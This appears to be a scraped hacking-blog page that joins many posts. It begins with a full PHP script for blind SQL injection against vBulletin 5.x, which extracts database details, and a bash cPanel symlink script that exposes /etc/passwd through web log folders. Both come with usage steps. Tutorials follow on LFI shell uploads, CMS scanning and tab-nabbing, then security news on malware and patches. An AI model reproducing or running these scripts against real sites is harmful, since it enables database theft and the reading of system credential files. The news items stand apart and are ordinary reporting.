vBulletin 5.x Remote Code Execution Exploit

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
   
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);
   
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}


// Get version


print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
   
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>

Sumber  Read More...

CPanel Symlink Bypasser

#!/bin/bash

# ______ __ ____ ___

# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /

# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /

# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /

# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/

# /_/ /____/_/

############################################

# CPanel Symlink Bypasser [Public Version] #

# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #

# alm3refh.com © Group XP 2014 #

############################################

#

# USAGE:

# 1. UPLOAD ME IN /home/user as Cpbypass.sh

# 2. GO TO CRON JOB

# 3. ADD THIS COMMAND:

# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com

#

# email@gmail.com = your email

#

#

# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!

# PS: ENJOY!

#

#

##########

# FILE #

##########

SYM="/etc/passwd"

########

echo ""

echo " ______ __ ____ ___"

echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"

echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "

echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "

echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "

echo " /_/ /____/_/ "

echo " CPanel Symlink Bypasser [Public Version]"

echo " By Hannibal Ksa & R3m0t3 Nu11"

echo ""

echo ""

########

rand=bypass$(( $RANDOM % 10 + 100 ));

###

# 1st 3xpl017

###

ln -sf $SYM tmp/analog/$rand.html

echo ""

echo "1st Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo "cpsession=cpanel user"

echo ""

###

# 2nd 3xpl017

###

ln -sf $SYM tmp/webalizer/$rand.html

echo ""

echo "2nd Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo "cpsession=cpanel user"

echo ""

###

# 3rd 3xpl017

###

ln -sf $SYM tmp/webalizerftp/$rand.html

echo ""

echo "3rd Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo "cpsession=cpanel user"

echo ""

###

# 4th 3xpl017

###

ln -sf $SYM logs/$rand.doc

echo ""

echo "4th Bypass:"

echo ""

echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"

echo "yourbitch=the cpanel url"

echo "cpsession=your cpanel session"

echo ""

echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"

echo ""

# DONE of the public version!

# E0F

Sumber 

Read More...

Hackers can steal Whatsapp conversations due to Android security flaw

A SECURITY VULNERABILTIY in the Android mobile operating system has been discovered that can allow cyber criminals to steal conversations from users of mobile messaging service Whatsapp.

Discovered by Bas Bosschert, the CTO of startup company Doublethink, the flaw was detailed in a blog post in which Bosschert demonstrated the method for accessing Whatsapp chats. He confirmed that the vulnerability still exists even after Google updated the Whatsapp app just last week.

The exploit is possible due to the Whatsapp database on Android being saved on the SD card, which can be read by any Android application if the user allows it to access the card.

"And since majority of the people [allow] everything on their Android device, this is not much of a problem," Bosschert said, noting that this is an issue in the Android infrastructure, specifically a problem with Android's data sandboxing system, as opposed to a security flaw in Whatsapp.

From there, a malicious app could access the Whatsapp conversation database, Bosschert said, testing his method with a companion app that he built, which uses a loading screen to distract the user while the database files are being uploaded.

Bosschert said that he can even decrypt the database with his own script despite the Whatsapp application's attempts in its recent update to encrypt the database to the point where it can't be opened by SQLite.

"We can simply decrypt this database using a simple python script," Bosschert said. "This script converts the [encrypted] database to a plain SQLite3 database.

"So, we can conclude that every application can read the Whatsapp database and it is also possible to read the chats from the encrypted databases. Facebook didn't need to buy Whatsapp to read your chats."

The full step by step guide for how he hacked Whatsapp can be found in Bosschert's blog post.

Whatsapp added privacy features and the ability to pay for a friend's subscription when it updated its Android app on Monday.

The added privacy includes controls for users to hide when they were last seen, their profile photo and their status updates from prying eyes.

While these are not groundbreaking changes, releasing a privacy update likely will appease its user following Facebook's $19bn acquisition of the company that has sparked privacy fears among Whatsapp users. These concerns are ongoing, as privacy groups called for the FTC to investigate the buyout last week, saying that it represents a threat to privacy

Sumber

Read More...

Fimap Tool - Local And Remote File Inclusion With Backbox Linux

 

Description: LFI ATTACK WITH FIMAP, target DVWA, arm BACKBOX LINUX.

First you need to install DVWA*, then run Apache server (comes with BackBox Linux), then read how to use FIMAP (terminal fimap -h), one c99 shell script (to find one type inurl:c99.txt in Google search box).You will need to set Apache directory permissions, for this you can use this bash script : http://www.linux.re.rs/files/scripts/dirbash.sh. I will show you how to upload shell to vulnerable server and exploit the vulnerability.

* How to install DVWA with BackBox Linux !

http://www.anonimus.re.rs/6562

Author : Nenad Marjanovic
IT nick : ZEROF
Author site : http://www.pentester.iz.rs 

Read More...

Urlcrazy Tool On Backtrack 5 R3

Description: URLCrazy is a tool that can generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. It generates 15 types of domain variants, knows over 8000 common misspellings, supports multiple keyboard layouts, can check if a typo is a valid domain, tests if domain typos are in use, and estimates the popularity of a typo.  

Sumber

Read More...

Vega Web Scanner On Backtrack 5 R3

  

Description: Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. 

Sumber 

Read More...

Tab-Nabbing With Dns Spoofing Using Backtrack

 

Description: In this Tutorial I have Explained how to use SET ( Social Engineering tool kit) for Tab nabbing and DNS Spoofing using Ettercap to make it more effective in LAN.......

In next tutorial I will Explain How to do it using port 443 of attacker machine instead of using port 80. So that even if victim type https://url instead of http then also he/she get attacked.

Sumber 

Read More...

Tutorial Wordpress Scanning

Assalamu'alaikum dan salam sejahtera buat kita semua
ketemu agy ma ane yg newbie nie
kali ini ane akan memberikan sedikit tutor mengenai Scanning Wordpress dan

tanpa banyak bacot langsung ke topic utamanya ea

CEKIDOT !!!

1. Download software wordpress scanner disini wp-scan

==============================================================

-=- kita akan menjalankan wordpress scanner

setelah di download,, extract dulu file tersebut

buka terminal dan ketikkan command berikut ini :

cd Downloads
cd WP-SCAN
perl wp-scan.pl target.com
ex : perl wp-scan.pl www.webhostingiix.com

setelah proses scan selesai,,kalian bisa melihat hasilnya(proses nya ga nampak disana)
ntar ada report kalo udh finished, bisa dilihat hasilnya di sqli-bugs.txt di folder wp-scan tadi

selanjutnya kalian bisa melakukan penginjectkan terhadap target
===========================================================================

silahkan tunggu sampai selesai dari proses scanning

nantinya disana akan tertera mana saja yang vuln

setelah selesai semuanya,,kita tinggal nyari exploitnya saudara-saudara

untuk nyari exploitnya bisa cari dimana saja

sekian dulu tutor cupu dari ane

semoga bermanfaat buat kita semua

akhir kata dari ane, wassalam

nb : vba & ArRay Read More...

Tutorial Joomla Web Scanner 1.7

Assalamu'alaikum dan salam sejahtera buat kita semua

sudah lama tidak update blog

oke langsung saja,,kali ini ane akan memberikan sedikit maenan buat tmen2 semua

sesuai dengan judulnya "Joomla Web Scanner 1.7"

dengan melihat judulnya saja,pasti temen-temen sudah pada ngerti tools ini buat apa

CEKIDOT !!!

1. download dulu toolsnya Joomla-Scan

2. setelah di download mari kita extract file tersebut

3. kemudian kita akan menjalankan proses scanning target

pertama-tama kita lihat dulu command untuk tool ini

ketikkan = ./joomlascan/pl help

nantinya akan keluar seperti ini

Usage:  ./joomlascan.pl -u <joomla_url> [options]

    == Options ==
      -p <string:int>  = proxy:port
      -a               = Admin folder (default '/administration')
      -v               = Check version
      -c               = Check components
      -f               = Check firewall
      -co              = Check bugs in core (require -v)
      -cm              = Check bugs in components (require -c)
      -all             = Check all (default)
      -ot              = Output to text file
      -oh              = Output to html file
      -update          = Search for updates
      -force-update    = Force to download updates
      -about           = About joomlascan
      -version         = Print version info
      -h, -help        = This help

    == Examples ==
      To scan running joomla version and components:
         $./joomlascan.pl -u www.host.com -v -c

      To scan version and core bugs:
         $./joomlascan.pl -u www.host.com -v -co

4. saatnya beraksi dengan mengetik command berikut ini

./joomlascan.pl -u www.target.com -v -co

tunggu sampai selesai proses scanning,,ngerokok dulu mas bro

setelah selesai akan seperti ini hasilnya

mungkin segitu dulu tutor cupu dari ane

semoga bermanfaat bagi kita semua

akhir kata dari ane,,wassalam Read More...

Anonymous and LulzSec trawl Google Code search for security holes

Exotically named hacking tools such as Low Orbit Ion Cannon and #RefRef have garnered plenty of headlines over the last few months but a new report suggests that the world's favourite search engine might be an equally important weapon in the arsenal of cyber-criminals and hacktivists.

The report explains how a simple search on Google Code is all that's needed to uncover a wealth of information that can be used to break into websites, cloud-based services and secure networks.

Google's Code Search is a tool that makes it easy for those with technical know-how to search the vast amount of computer code that is publicly available online.

Researchers from IT security consultancy Stach & Lui report that hacking groups such as Anonymous and LulzSec are using Google Code search for a number of nefarious activities.

With a few well-crafted searches they can uncover passwords for cloud services, configuration files for Virtual Private Networks and find code  that is vulnerable to common website hacking tactics such as SQL injection.

While the findings provide a much-needed wake up call to online businesses, admins and developers, they also offer a fascinating insight into the motivation of hacking collectives such as Anonymous and LulzSec.

According to Stach & Lui ‘Google Hacking’, as the technique is known, is believed to be Anonymous and LulzSec’s primary means of identifying potential targets.
Rather than being motivated by politics or injustice, hacking groups may simply be targeting organisations because Google Code search has turned up a vulnerability too tempting to ignore, making them less political action groups, more malicious 21st century Wombles.

So what can online businesses do to protect themselves from these online, evil Uncle Bulgarias?

The first line of defence is to make sure that developers are following established best practice and that executives are creating a culture where best practice is encouraged and supported. Including passwords in code has always been a bad idea and techniques to prevent and detect SQL injection vulnerabilities are well established.

Businesses should also prepare so that if they are successfully attacked after a data leak they don't lose their shirt. Data stored in the cloud can be rendered useless to attackers by the simple expedient of encrypting it.

Stach & Lui warn that in the businesses using cloud services should also take a close look at the small print; many cloud service providers state that they don't accept responsibility for leaks.

For more on this take a look at the Stach & Lui's Pulp Google Hacking presentation.

Read More...

Adobe, Apple, Microsoft & Mozilla Issue Critical Patches

Adobe, Apple, Microsoft and Mozilla all released updates on Tuesday to fix critical security flaws in their products. Adobe issued a patch that corrects four vulnerabilities in Shockwave Player, while Redmond pushed updates to address four Windows flaws. Apple slipped out an update that mends at least 17 security holes in its version of Java, and Mozilla issued yet another major Firefox release, Firefox 8.

The only “critical” patch from Microsoft this month is a dangerous Windows flaw that could be triggered remotely to install malicious software just by sending the target system specially crafted packets of data. Microsoft says this vulnerability may be difficult to reliably exploit, but it should be patched immediately. Information on the other three flaws fixed this week is here. The fixes are available via Windows Updates for most supported versions of the operating system, including XP, Vista and Windows 7.


Adobe’s Shockwave update also fixes critical flaws, but users should check to see if they have this program installed before trying to update it. To test whether you have Shockwave installed, visit this page; if you see an animation, it’s time to update. If you see a prompt to install Shockwave, there is no need to install it. Mozilla Firefox users without Shockwave Player installed may still see “Shockwave Flash” listed in the “Plugins” directory of the browser; this merely indicates that the user has Adobe’s Flash Player installed.

The vulnerabilities fixed by this update exist in versions of Shockwave 11.6.1.629 and earlier. The latest version, v. 11.6.3.633, is available here.  As I noted earlier this year, I haven’t had Shockwave on my system for some time now and don’t seem to have missed it. I’m sure it has its uses, but to me Shockwave is just another Adobe program that requires constant care and feeding. What’s more, like Adobe’s Flash Player, Shockwave demands two separate installation procedures for IE and non-IE browsers.

Hat tip to the SANS Internet Storm Center for the heads up on the Java fix from Apple. This update, available via Software Update or Apple Downloads, essentially brings Snow Leopard and Lion up to date with the Oracle patches released last month in Java 6 Update 29 (Apple maintains its own version of Java).

If you use Mozilla Firefox or Thunderbird, you may have noticed that Mozilla is pushing out another major upgrade that includes critical fixes to these programs; both have now been updated to version 8. If you’re still running Firefox version 3.6.x, Mozilla has updated that to 3.6.24 (if anyone can help decipher Mozilla’s timeline for exactly how long it will continue to support this workhorse version of Firefox, please drop a line in the comments below). Perhaps I’m becoming a curmudgeon, but I’m growing weary of the incessant update prompts from Firefox. It seems that almost every time I start it up it’s asking to restart the browser or to remove plugins that no longer work with the latest version. I’ve been gradually transitioning more of my work over to Google Chrome, which seems faster and updates the browser and any installed plugins silently (and frequently patches oft-targeted plugins like Flash Player even before Adobe officially releases the update). Read More...

Apple Bans Security Researcher Charlie Miller For Exposing iOS Exploit

The latest wave in the infosec world is that Apple has banned the well known security researcher – Charlie Miller – from it’s developer program for exposing a new iOS exploit.

It’s not really the smartest move as I’m pretty sure anyone as smart as Charlie Miller still has plenty of options – use another person’s account, sign up another account with a different identity, hack the phone without the developer program access and so on..

Really it’s quite a harsh move from Apple and it’s not going to make them any friends in the security industry.

Apple has banned well-known security researcher Charlie Miller from its developer program, for creating an apparently benign iOS app that was actually designed to exploit a security flaw he had uncovered in the firmware.

Within hours of talking about the exploit with Forbes’ security reporter Andy Greenberg, who published the details, Miller received an email from Apple: “This letter serves as notice of termination of the iOS Developer Program License Agreement … between you and Apple. Effective immediately.”

Based on Greenberg’s follow-up story, Apple was clearly within its rights to do so. Miller created a proof-of-concept application to demonstrate the security flaw and how it could be exploited by malicious code. He then hid it inside an apparently legitimate stock ticker program, an action that, according to Apple, “violated the developer agreement that forbid[s] him to ‘hide, misrepresent or obscure’ any part of his app,” Greenberg wrote.

He quoted Miller, who works for security consultancy Acuvant, “I’m mad. I report bugs to them all the time. Being part of the developer program helps me do that. They’re hurting themselves, and making my life harder.”

In a way though, you have to agree that Miller did violate the very specific developer program agreement by hiding the PoC inside a legitimate application. That probably wasn’t his smartest idea, but then again it’s helping Apple and he’s not doing it in a malicious way to infect people – he’s doing it as a security researcher.

Apple should be more proactive on working with people like this, people who are actually fixing bugs in their products for free and improving the user experience.

It’s the way Apple operates though, secretive, exclusive, domineering etc. If you don’t do things their way, screw you.


Miller, a former National Security Agency staffer, is a well-known “white hat” hacker (he made Network World’s recent list of “Security All Stars”), with expertise in Apple’s Mac OS X and iOS platforms, including the Safari browser, and in Android. Miller “has found and reported dozens of bugs to Apple in the last few years,” Greenberg noted. Miller reported the latest one barely three weeks ago, and it was Greenberg’s public account of it yesterday, in advance of a planned public presentation by Miller next week, that got the researcher kicked out of the developer program.

The vulnerability is a fascinating exercise in information security sleuthing. Miller uncovered a flaw introduced in Apple’s restrictions on code signing on iOS devices. Code signing is a process by which only Apple-approved commands run in device memory, according to Greenberg’s account.

Miller began to suspect a flaw when Apple released iOS 4.3 in March. He realized that to boost the speed of the mobile Safari browser, Apple for the first time had allowed javascript code from a website to run at a deeper level in memory. This entailed creating a security exception, allowing the browser to run unapproved code. According to Greenberg’s story, Apple created other security restrictions to block untrusted websites from exploiting this exception, so that only the browser could make use of it.

Miller wasn’t the only one to notice that Apple had done something different with Safari in iOS 4.3, but many didn’t understand what was actually happening. Various news sites and bloggers claimed that Web apps running outside of Safari, and its new Nitro javascript engine, were slower. Some suggested that Apple was deliberately slowing them down to make Web apps less attractive than native ones.

The way in which Miller uncovered the flaw once again shows his technical brilliance – something which Apple really should be harnessing rather than turning away.

A lot of people noticed changes with iOS 4.3, but couldn’t actually figure out what was going on. Well that’s what we know in the public realm anyway, no doubt the bad guys had their eyes on it and were digging in with much more malicious exploits.

It basically seems like a way to bypass any kind of code validation by Apple and execute arbitrary code from an attack server – dangerous indeed. Read More...

Fresh Phish disguised as a PayPal Urgent Account Review Notification

While browsing the web this evening waiting for thotcon 0x3 general admission tickets to go on sale, my wife's spidey senses were tingling when she asked me, "Is this a scam?"

Turning towards her monitor I see she has an email open inside her webmail account. The email has a pretty good sense of urgency written into it that compels the reader to follow the instructions provided and protect their information.

It begins:

"As of the 3rd of November 2011, our security system has blocked unusual charges to a credit card linked to your account."

And concludes:

"Sincerely, PayPal Account Review Team"

Unfortunately, the average person who does not read Naked Security might easily be duped of their PII (Personally Identifiable Information).

Phishing scams are nothing new. Hopefully, if people stopped falling for them, then perhaps the phishing scams might stop?
It really comes down to education and great protection (for when education fails).
The home use version of Sophos Endpoint Security and Control did a fantastic job of catching the attack as Mal/Phish-A.

The home use version is available to Sophos customer's employees. Check with your employer if the home use program is available at your organization before installing Sophos software willy nilly.

I spoke earlier in the week with a security professional who sent 500 spear phishing attacks internally to his colleagues. Of the 500 emails sent, 25 people responded by completing the form and surrendering their information.
While a 5% rate may seem small, he felt even 1% was too high. Education helped a lot, but not completely. Do you agree?
When read, this fresh phish posing as PayPal immediately puts the recipient into an emotional state that their account was compromised and their funds are in jeopardy which then clouds their judgement.

Since PayPal is a trusted name in the electronic payments industry, they of course have controls to prevent fraudulent transactions (but no one is perfect). This phish takes advantage of that trust by explaining that the breached account has been locked for your protection.

Now to regain access to your funds it's imperative to download the attachment and complete the form.

After downloading and opening the attachment it will open your web browser. As you can see, this web page looks very genuine and might lower your guard into believing it really came from PayPal.


There are a few mistakes in this poorly executed phish which caused education to prevail over emotion.

The most basic one is that there isn't a PayPal email address associated with the inbox which received this phish.

Another one to point out is that the (From: "PayPal") is really not from PayPal.
The phisher used a domain name pp-redacted-.com which based on a whois look up doesn't have anything to do with PayPal. It belongs to an instrumentation company out of Massachusetts that happens to have similar initials as PayPal.
While my wife isn't a security professional or an expert with computers, her education to not trust every email in her inbox (beyond spam) triggered a gut feeling to think more clearly.

If it doesn't feel right, then it's not. Go with your gut!
Until next time, stay safe and secure online.

Read More...

Anonymous abandons plan to expose Mexican drug cartel collaborators

Hacker group backs away from exposing people it believes are connected to Zetas cartel after alleged threat of killings

A plan by the international hacker movement Anonymous to expose collaborators of Mexico's notorious Zetas drugs cartel has come to an abrupt end. A US activist backed away from publishing the names after an alleged counter-threat of mass retaliatory killings.

"This moves the operation from being a risk to knowing that I would be murdering people," Anonymous participant Barrett Brown told the Guardian on Friday.

Brown's withdrawal from Operation Cartel puts an end to one of the most bizarre and confusing episodes in Mexico's drug wars.

It began with a video which appeared online in early October and promised to reveal the identities of people working with the Zetas unless the cartel released an Anonymous member kidnapped in the Mexican city of Veracruz.

The video prompted furious online debate: while Anonymous has previously targeted business and government websites and databases around the world, it was unclear how it could confront Mexico's amorphous – and deadly – drug trafficking organisations. Conflicting messages appeared on Twitter and other social networking sites, with some activists saying the operation had been cancelled while others pledged to continue.

This culminated in Mexico on Thursday when Spanish-speaking Anonymous participants, who had previously pledged to continue, announced that the Zetas had let the kidnapped member go.

They also said that she carried with her a message from the cartel threatening to kill 10 people for every person named and that they had decided to abandon their plans.

Brown, a prominent Texas-based activist and one of the few willing to be named, initially said Mexican hackers had promised to give him information on Zeta collaborators that they had taken from Mexican government sites and that it would be released in the next few days.

But while he said he was comfortable with running personal risks and "passing a death sentence" on those he identified, the wider retaliation threat had made him "rethink my position".

He added that Anonymous would continue to explore ways of using the internet to help spark some kind of mass response to "the near collapse" in Mexico, as he claims it did in Tunisia and Egypt. Read More...

New Mac Malware Variants Found in Trojaned Apps Are Stealing Data

Researchers have discovered a series of variants of the DevilRobber Mac OS X Trojan that have a menu of different capabilities, depending upon the strain, and can not only mine Bitcoins using the infected machine's processing power, but also steals files, installs a Web proxy and may steal the user's Safari browsing history.

The new variants of DevilRobber, which has been making the rounds recently, appear to each have a different set of capabilities because they may have each been built for specific jobs, according to an analysis of the malware by researchers at F-Secure. Some of the variants appear to be looking for specific pornographic files on infected Macs and steals passwords from the machine in order to access any files that may be protected. All of the variants of DevilRobber have the ability to take data from the machine and upload it to a remote server.
The new variants were discovered in legitimate Mac applications that had been Trojaned and then shared on Pirate Bay.

"The specific port used by the web proxy depends on the variant. The specific FTP server for data stealing also varies between samples. And DevilRobber's data stealing routine is repeated on a fixed interval — every 43200, 60000, or 100000 seconds, depending on the sample," F-Secure says in its analysis.

Mac malware has been making some headlines in the last few months, as attackers have begun applying to OS X some of the tactics they've been using on Windows for decades. In September, a Trojan called Imuler was found packed inside malicious PDFs, a trick that attackers have been using to get their malware into the hands of users for years now. And earlier in the year the MacDefender malware made a big splash as the first Mac-specific rogue antivirus program to emerge.

Apple is beginning to take some steps to address the threats facing its users, including the announcement this week that all apps submitted to the Mac App Store will have to have a sandbox by March 2012.

Read More...

Zero-Day Exploit Used for DUQU

We have been closely monitoring developments on the DUQU malware since our initial blog post when the threat broke the news. And just recently, the Hungary-based security laboratory that initially reported about DUQU released more information that sheds more light into the nature of the said threat.

Their report indicates that a Microsoft Word document that triggers a zero-day kernel exploit was identified as the dropper for DUQU. Upon successful exploitation, the Microsoft Word file drops the installer files that load the DUQU components that were initially reported a couple of weeks back.

The installer files are composed of a .SYS file detected as RTKT_DUQU.B, and a .DLL file detected as TROJ_DUQU.B. RTKT_DUQU.B loads TROJ_DUQU.B into the system. TROJ_DUQU.B, on the other hand, drops and decrypts the DUQU components, RTKT_DUQU.A, TROJ_DUQU.ENC, and TROJ_DUQU.CFG. Below is a simple behavior diagram of the threat.

Details regarding the zero-day exploit used have not yet been disclosed. However, Microsoft is expected to release information on it soon. As a member of the Microsoft Active Protections Program (MAPP), if Microsoft provides information on ways we can protect customers while a security patch is being developed, we will add these protections to our products as quickly as possible and update you with that information.


This new information allows us to have more educated theories of how the DUQU attack took place. Considering the usage of a Microsoft Word document, it is likely that this was initially deployed through email messages sent to employees in the targeted organization.This further verifies our earlier hypothesis that DUQU is part of a highly targeted attack aimed at exfiltrating information from targeted entities. For more information on DUQU and the nature of highly targeted attacks, please check the following reports:

• DUQU Uses STUXNET-Like Techniques to Conduct Information Theft
• Anatomy of a Data Breach

We have created the proactive detections of TROJ_DUQUCFG.SME and RTKT_DUQU.SME to address future variants of DUQU component files. Also, the Threat Discovery Appliance (TDA) protects enterprise networks by detecting network activity and the malwares’ connection to the C&C server through the rules 473 TCP_MALICIOUS_IP_CONN, 528 HTTP_Request_DUQU, and 529 HTTP_Request_DUQU2.

Update as of November 3, 2011, 8:30 PM PST

Microsoft released a security advisory regarding the vulnerability used by DUQU.
The vulnerability exists in the Win32k TrueType font parsing engine and allows elevation of privilege. According to the advisory, a successful exploitation can allow an attacker to run arbitrary code in kernel mode.
We are currently collecting more information about this, and will update this blog entry with our findings as soon as possible. Read More...

Rec Studio 4 – Reverse Engineering Compiler & Decompiler

REC Studio is an interactive decompiler. It reads a Windows, Linux, Mac OS X or raw executable file, and attempts to produce a C-like representation of the code and data used to build the executable file. It has been designed to read files produced for many different targets, and it has been compiled on several host systems.

REC Studio 4 is a complete rewrite of the original REC decompiler. It uses more powerful analysis techniques such as partial Single Static Assignment (SSA), allows loading Mac OS X files and supports 32 and 64 bit binaries.

Although still under development, it has reached a stage that makes it more useful than the old Rec Studio 2.

Features


Multihost: Rec Studio runs on Windows XP/Vista/7, Ubuntu Linux, Mac OS X.
Symbolic information support using Dwarf 2 and partial recognition of Microsoft’s PDB format.
C++ is partially recognized: mangled names generated by gcc are demangled, as well as inheritance described in dwarf2 is honored. However, C++ is a very broad and difficult language, so some features like templates won’t likely be ever supported.
Types and function prototype definitions can be specified in text files. Some standard Posix and Windows APIs are already provided in the Rec Studio package.
Interactivity is supported, limited to definition of sections, labels and function entry points. Will need to improve it to support in-program definition of types and function parameters.

Although REC can read Win32 executable (aka PE) files produced by Visual C++ or Visual Basic 5, there are limitations on the output produced. REC will try to use whatever information is present in the .EXE symbol table. If the .EXE file was compiled without debugging information, if a program data base file (.PDB) or Codeview (C7) format was used, or if the optimization option of the compiler was enabled, the output produced will not be very good. Moreover, Visual Basic 5 executable files are a mix of Subroutine code and Form data. It is almost impossible for REC to determine which is which. The only option is to use a .cmd file and manually specify which area is code and which area is data.

You can download Rec Studio 4 here:

Windows –
Ubuntu –
Mac –

Or read more . Read More...

DevilRobber Mac OS X Trojan horse spies on you, uses GPU for Bitcoin mining

Yesterday, users of Sophos's security products (including our free anti-virus for Mac home users) had their protection automatically updated to protect against a new Mac OS X Trojan horse that has been distributed via torrent sites such as PirateBay.

Copies of the legitimate Mac OS X image editing app GraphicConverter version 7.4 were uploaded to file-sharing networks. However, they came with an unexpected addition.

Hidden inside the download was a copy of the OSX/Miner-D (also known as 'DevilRobber') Trojan horse.

If your Mac computer was infected by the malware, the first thing you might notice is performance becoming sluggish.

That's because OSX/Miner-D tries to generate Bitcoins, the currency of the anonymous digital cash system, by stealing lots of GPU (Graphics Processing Unit) time.
GPUs are much better than regular CPUs at performing the mathematical calculations required for Bitcoin mining.
Yes, this Mac malware is stealing computing time as well as data.

In addition to Bitcoin mining, OSX/Miner-D also spies on you by taking screen captures and stealing your usernames and passwords. In addition, it runs a script that copies information to a file called dump.txt regarding truecrypt data, Vidalia (TOR plugin for Firefox), your Safari browsing history, and .bash_history.

Curiously, the Trojan also hunts for any files that match "pthc". It's unclear whether this is intended to uncover child abuse material or not (the phrase "pthc" is sometimes used on the internet to refer to pre-teen hardcore pornography).
To complete the assault - if the malware finds the user's Bitcoin wallet it will also steal that.


Of course, the producers of GraphicConverter have done nothing wrong themselves - they are victims of the criminals who are using their popular software as a trap to infect Mac users who download software from unofficial sources.

